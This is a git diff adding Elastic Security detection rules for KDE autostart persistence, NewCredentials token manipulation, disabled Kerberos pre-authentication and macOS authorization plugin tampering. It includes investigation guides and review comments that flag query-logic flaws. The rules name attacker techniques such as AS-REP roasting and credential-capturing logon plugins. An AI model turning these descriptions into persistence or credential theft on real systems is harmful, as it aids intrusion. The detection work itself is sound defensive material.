"host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.protocol", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "e3cf38fa-d5b8-46cc-87f9-4a7513e4281d", + "setup": "## Setup\n\nIf enabling an EQL rule 
on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1573", + "name": "Encrypted Channel", + "reference": "https://attack.mitre.org/techniques/T1573/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "e3cf38fa-d5b8-46cc-87f9-4a7513e4281d_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e3e904b3-0a8e-4e68-86a8-977a163e21d3_110.json b/packages/security_detection_engine/kibana/security_rule/e3e904b3-0a8e-4e68-86a8-977a163e21d3_110.json new file mode 100644 index 00000000000..b44bd881c83 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/e3e904b3-0a8e-4e68-86a8-977a163e21d3_110.json 
@@ -0,0 +1,91 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the creation or modification of a K Desktop Environment (KDE) AutoStart script or desktop file that will execute upon each user logon. Adversaries may abuse this method for persistence.", + "from": "now-9m", + "index": [ + "auditbeat-*", + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Persistence via KDE AutoStart Script or Desktop File Modification", + "note": "## Triage and analysis\n\n### Investigating Persistence via KDE AutoStart Script or Desktop File Modification\n\nK Desktop Environment (KDE) is a popular graphical desktop environment for Linux systems. It supports AutoStart scripts and desktop files that execute automatically upon user logon.\n\nAdversaries may exploit this feature to maintain persistence on a compromised system by creating or modifying these files.\n\nThe detection rule 'Persistence via KDE AutoStart Script or Desktop File Modification' is designed to identify such activities by monitoring file events on Linux systems. It specifically targets the creation or modification of files with extensions \".sh\" or \".desktop\" in various AutoStart directories. By detecting these events, the rule helps security analysts identify potential abuse of KDE AutoStart functionality by malicious actors.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. 
If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n### Possible investigation steps\n\n- Investigate the file that was created or modified.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (\\n path LIKE '/home/%/.config/autostart/%.sh' OR path LIKE '/home/%/.config/autostart/%.desktop' OR\\n path LIKE '/root/.config/autostart/%.sh' OR path LIKE '/root/.config/autostart/%.desktop' OR\\n path LIKE '/home/%/.kde/Autostart/%.sh' OR path LIKE '/home/%/.kde/Autostart/%.desktop' OR\\n path LIKE '/root/.kde/Autostart/%.sh' OR path LIKE '/root/.kde/Autostart/%.desktop' OR\\n path LIKE '/home/%/.kde4/Autostart/%.sh' OR path LIKE '/home/%/.kde4/Autostart/%.desktop' OR\\n path LIKE '/root/.kde4/Autostart/%.sh' OR path LIKE '/root/.kde4/Autostart/%.desktop' OR\\n path LIKE '/home/%/.kde/share/autostart/%.sh' OR path LIKE '/home/%/.kde/share/autostart/%.desktop' OR\\n path LIKE '/root/.kde/share/autostart/%.sh' OR path LIKE '/root/.kde/share/autostart/%.desktop' OR\\n path LIKE '/home/%/.kde4/share/autostart/%.sh' OR path LIKE '/home/%/.kde4/share/autostart/%.desktop' OR\\n path LIKE '/root/.kde4/share/autostart/%.sh' OR path LIKE '/root/.kde4/share/autostart/%.desktop' OR\\n path LIKE '/home/%/.local/share/autostart/%.sh' OR path LIKE '/home/%/.local/share/autostart/%.desktop' OR\\n path LIKE '/root/.local/share/autostart/%.sh' OR path LIKE '/root/.local/share/autostart/%.desktop' OR\\n path LIKE '/home/%/.config/autostart-scripts/%.sh' OR path LIKE '/home/%/.config/autostart-scripts/%.desktop' OR\\n path LIKE '/root/.config/autostart-scripts/%.sh' OR path LIKE '/root/.config/autostart-scripts/%.desktop' OR\\n path LIKE '/etc/xdg/autostart/%.sh' OR path LIKE '/etc/xdg/autostart/%.desktop' OR\\n path LIKE '/usr/share/autostart/%.sh' OR path LIKE '/usr/share/autostart/%.desktop'\\n)\\n\"}}\n - 
!{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (\\n path LIKE '/home/%/.config/autostart/%.sh' OR path LIKE '/home/%/.config/autostart/%.desktop' OR\\n path LIKE '/root/.config/autostart/%.sh' OR path LIKE '/root/.config/autostart/%.desktop' OR\\n path LIKE '/home/%/.kde/Autostart/%.sh' OR path LIKE '/home/%/.kde/Autostart/%.desktop' OR\\n path LIKE '/root/.kde/Autostart/%.sh' OR path LIKE '/root/.kde/Autostart/%.desktop' OR\\n path LIKE '/home/%/.kde4/Autostart/%.sh' OR path LIKE '/home/%/.kde4/Autostart/%.desktop' OR\\n path LIKE '/root/.kde4/Autostart/%.sh' OR path LIKE '/root/.kde4/Autostart/%.desktop' OR\\n path LIKE '/home/%/.kde/share/autostart/%.sh' OR path LIKE '/home/%/.kde/share/autostart/%.desktop' OR\\n path LIKE '/root/.kde/share/autostart/%.sh' OR path LIKE '/root/.kde/share/autostart/%.desktop' OR\\n path LIKE '/home/%/.kde4/share/autostart/%.sh' OR path LIKE '/home/%/.kde4/share/autostart/%.desktop' OR\\n path LIKE '/root/.kde4/share/autostart/%.sh' OR path LIKE '/root/.kde4/share/autostart/%.desktop' OR\\n path LIKE '/home/%/.local/share/autostart/%.sh' OR path LIKE '/home/%/.local/share/autostart/%.desktop' OR\\n path LIKE '/root/.local/share/autostart/%.sh' OR path LIKE '/root/.local/share/autostart/%.desktop' OR\\n path LIKE '/home/%/.config/autostart-scripts/%.sh' OR path LIKE '/home/%/.config/autostart-scripts/%.desktop' OR\\n path LIKE '/root/.config/autostart-scripts/%.sh' OR path LIKE '/root/.config/autostart-scripts/%.desktop' OR\\n path LIKE 
'/etc/xdg/autostart/%.sh' OR path LIKE '/etc/xdg/autostart/%.desktop' OR\\n path LIKE '/usr/share/autostart/%.sh' OR path LIKE '/usr/share/autostart/%.desktop'\\n)\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n- Investigate abnormal behaviors by the subject process/user such as network connections, file modifications, and any other spawned child processes.\n - Investigate listening ports and open sockets to look for potential command and control traffic or data exfiltration.\n - !{osquery{\"label\":\"Osquery - Retrieve Listening Ports\",\"query\":\"SELECT pid, address, port, socket, protocol, path FROM listening_ports\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Open Sockets\",\"query\":\"SELECT pid, 
family, remote_address, remote_port, socket, state FROM process_open_sockets\"}}\n - Identify the user account that performed the action, analyze it, and check whether it should perform this kind of action.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n\n### False positive analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator who uses cron jobs for administrative purposes, consider adding exceptions for this specific administrator user account. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "file where host.os.type == \"linux\" and event.type != \"deletion\" and\n file.extension in (\"sh\", \"desktop\") and\n file.path :\n (\n \"/home/*/.config/autostart/*\", \"/root/.config/autostart/*\",\n \"/home/*/.kde/Autostart/*\", \"/root/.kde/Autostart/*\",\n \"/home/*/.kde4/Autostart/*\", \"/root/.kde4/Autostart/*\",\n \"/home/*/.kde/share/autostart/*\", \"/root/.kde/share/autostart/*\",\n \"/home/*/.kde4/share/autostart/*\", \"/root/.kde4/share/autostart/*\",\n \"/home/*/.local/share/autostart/*\", \"/root/.local/share/autostart/*\",\n \"/home/*/.config/autostart-scripts/*\", \"/root/.config/autostart-scripts/*\",\n \"/etc/xdg/autostart/*\", \"/usr/share/autostart/*\"\n ) and\n not process.name in (\"yum\", \"dpkg\", \"install\", \"dnf\", \"teams\", \"yum-cron\", \"dnf-automatic\", \"docker\", \"dockerd\", \n \"rpm\", \"pacman\", \"podman\", \"nautilus\", \"remmina\", \"cinnamon-settings.py\")\n", + "references": [ + "https://userbase.kde.org/System_Settings/Autostart", + "https://www.amnesty.org/en/latest/research/2020/09/german-made-finspy-spyware-found-in-egypt-and-mac-and-linux-versions-revealed/", + "https://www.intezer.com/blog/research/operation-electrorat-attacker-creates-fake-companies-to-drain-your-crypto-wallets/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": 
"file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "e3e904b3-0a8e-4e68-86a8-977a163e21d3", + "setup": "## Setup\n\nThis rule requires data coming in from one of the following integrations:\n- Elastic Defend\n- Auditbeat\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. 
Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions <8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "e3e904b3-0a8e-4e68-86a8-977a163e21d3_110", + "type": "security-rule" +} \ No newline at end of file 
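Review bot: The false-positive exclusion `not process.name in ("yum", "dpkg", "install", "dnf", "teams", ...)` in `query` keys on the bare process name, so any process that happens to carry one of these names is excluded, not just the package managers; the generic entries (`install`, `teams`, `docker`) are the ones most worth anchoring to an expected `process.executable` path, which is not among the rule's `required_fields` today. In `note`, the false-positive bullet "a system administrator who uses cron jobs for administrative purposes" reads as a leftover from a cron rule and should say "who manages KDE autostart entries" or similar, since cron jobs are not what this rule observes.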
diff --git a/packages/security_detection_engine/kibana/security_rule/e468f3f6-7c4c-45bb-846a-053738b3fe5d_2.json b/packages/security_detection_engine/kibana/security_rule/e468f3f6-7c4c-45bb-846a-053738b3fe5d_2.json new file mode 100644 index 00000000000..9fe3c69cda5 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/e468f3f6-7c4c-45bb-846a-053738b3fe5d_2.json 
@@ -0,0 +1,105 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a new credentials logon type performed by an unusual process. This may indicate the existence of an access token forging capability that are often abused to bypass access control restrictions.", + "from": "now-9m", + "history_window_start": "now-7d", + "index": [ + "winlogbeat-*", + "logs-system.*", + "logs-windows.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "First Time Seen NewCredentials Logon Process", + "new_terms_fields": [ + "process.executable" + ], + "query": "event.category:\"authentication\" and host.os.type:\"windows\" and winlog.logon.type:\"NewCredentials\" and winlog.event_data.LogonProcessName:(Advapi* or \"Advapi \") and not winlog.event_data.SubjectUserName:*$ and not process.executable :???\\\\Program?Files*\n", + "references": [ + "https://www.elastic.co/pt/blog/how-attackers-abuse-access-token-manipulation" + ], + "related_integrations": [ + { + "package": "system", + "version": "^1.6.4" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.LogonProcessName", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.SubjectUserName", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.logon.type", + "type": "unknown" + } + ], + "risk_score": 47, + "rule_id": "e468f3f6-7c4c-45bb-846a-053738b3fe5d", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": 
"https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1134", + "name": "Access Token Manipulation", + "reference": "https://attack.mitre.org/techniques/T1134/", + "subtechnique": [ + { + "id": "T1134.001", + "name": "Token Impersonation/Theft", + "reference": "https://attack.mitre.org/techniques/T1134/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 2 + }, + "id": "e468f3f6-7c4c-45bb-846a-053738b3fe5d_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e514d8cd-ed15-4011-84e2-d15147e059f1_110.json b/packages/security_detection_engine/kibana/security_rule/e514d8cd-ed15-4011-84e2-d15147e059f1_110.json new file mode 100644 index 00000000000..8b612824c24 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/e514d8cd-ed15-4011-84e2-d15147e059f1_110.json 
@@ -0,0 +1,132 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the modification of an account's Kerberos pre-authentication options. An adversary with GenericWrite/GenericAll rights over the account can maliciously modify these settings to perform offline password cracking attacks such as AS-REP roasting.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-system.*", + "logs-windows.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Kerberos Pre-authentication Disabled for User", + "note": "## Triage and analysis\n\n### Investigating Kerberos Pre-authentication Disabled for User\n\nKerberos pre-authentication is an account protection against offline password cracking. When enabled, a user requesting access to a resource initiates communication with the Domain Controller (DC) by sending an Authentication Server Request (AS-REQ) message with a timestamp that is encrypted with the hash of their password. If and only if the DC is able to successfully decrypt the timestamp with the hash of the user\u2019s password, it will then send an Authentication Server Response (AS-REP) message that contains the Ticket Granting Ticket (TGT) to the user. Part of the AS-REP message is signed with the user\u2019s password. 
Microsoft's security monitoring [recommendations](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4738) state that `'Don't Require Preauth' \u2013 Enabled` should not be enabled for user accounts because it weakens security for the account\u2019s Kerberos authentication.\n\nAS-REP roasting is an attack against Kerberos for user accounts that do not require pre-authentication, which means that if the target user has pre-authentication disabled, an attacker can request authentication data for it and get a TGT that can be brute-forced offline, similarly to Kerberoasting.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Determine if the target account is sensitive or privileged.\n- Inspect the account activities for suspicious or abnormal behaviors in the alert timeframe.\n\n### False positive analysis\n\n- Disabling pre-authentication is a bad security practice and should not be allowed in the domain. The security team should map and monitor any potential benign true positives (B-TPs), especially if the target account is privileged.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Reset the target account's password if there is any risk of TGTs having been retrieved.\n- Re-enable the preauthentication option or disable the target account.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "event.code:4738 and winlog.api:\"wineventlog\" and message:\"'Don't Require Preauth' - Enabled\"\n", + "references": [ + "https://harmj0y.medium.com/roasting-as-reps-e6179a65216b", + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4738", + "https://github.com/atc-project/atomic-threat-coverage/blob/master/Atomic_Threat_Coverage/Logging_Policies/LP_0026_windows_audit_user_account_management.md" + ], + "related_integrations": [ + { + "package": "system", + "version": "^1.6.4" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": true, + "name": "message", + "type": "match_only_text" + }, + { + "ecs": false, + "name": "winlog.api", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "e514d8cd-ed15-4011-84e2-d15147e059f1", + "setup": "## Setup\n\nThe 'Audit User Account Management' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nAccount Management >\nAudit User Account Management (Success,Failure)\n```\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Tactic: Defense Evasion", + "Tactic: Privilege Escalation", + "Resources: Investigation Guide", + "Use Case: Active Directory Monitoring", + "Data Source: Active Directory" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": 
"TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1558", + "name": "Steal or Forge Kerberos Tickets", + "reference": "https://attack.mitre.org/techniques/T1558/", + "subtechnique": [ + { + "id": "T1558.004", + "name": "AS-REP Roasting", + "reference": "https://attack.mitre.org/techniques/T1558/004/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1078", + "name": "Valid Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/", + "subtechnique": [ + { + "id": "T1078.002", + "name": "Domain Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 110 + }, + "id": "e514d8cd-ed15-4011-84e2-d15147e059f1_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e6c98d38-633d-4b3e-9387-42112cd5ac10_106.json b/packages/security_detection_engine/kibana/security_rule/e6c98d38-633d-4b3e-9387-42112cd5ac10_106.json new file mode 100644 index 00000000000..bc6e2f6f309 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/e6c98d38-633d-4b3e-9387-42112cd5ac10_106.json 
@@ -0,0 +1,98 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Authorization plugins are used to extend the authorization services API and implement mechanisms that are not natively supported by the OS, such as multi-factor authentication with third party software. Adversaries may abuse this feature to persist and/or collect clear text credentials as they traverse the registered plugins during user logon.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Authorization Plugin Modification", + "query": "event.category:file and host.os.type:macos and not event.type:deletion and\n file.path:(/Library/Security/SecurityAgentPlugins/* and\n not /Library/Security/SecurityAgentPlugins/TeamViewerAuthPlugin.bundle/*) and\n not process.name:shove and process.code_signature.trusted:true\n", + "references": [ + "https://developer.apple.com/documentation/security/authorization_plug-ins", + "https://www.xorrior.com/persistent-credential-theft/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "e6c98d38-633d-4b3e-9387-42112cd5ac10", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/", + "subtechnique": [ + { + "id": "T1547.002", + "name": "Authentication Package", + "reference": "https://attack.mitre.org/techniques/T1547/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 106 + }, + "id": "e6c98d38-633d-4b3e-9387-42112cd5ac10_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e6e8912f-283f-4d0d-8442-e0dcaf49944b_107.json b/packages/security_detection_engine/kibana/security_rule/e6e8912f-283f-4d0d-8442-e0dcaf49944b_107.json new file mode 100644 index 00000000000..16c02f03f5c --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/e6e8912f-283f-4d0d-8442-e0dcaf49944b_107.json 
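Review bot: In `query`, `not process.name:shove and process.code_signature.trusted:true` parses as `(not process.name:shove) and process.code_signature.trusted:true` because KQL's `not` binds tighter than `and`, so the rule fires only when the modifying process is trusted-signed and never when an unsigned or untrusted binary writes under `/Library/Security/SecurityAgentPlugins/` — the opposite of what excluding the signed `shove` helper suggests. Parenthesise the exclusion: `not (process.name:shove and process.code_signature.trusted:true)`. A rule test with an unsigned process creating a bundle under that path would have caught this, and the same precedence should be double-checked in the TeamViewer path exclusion above it.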
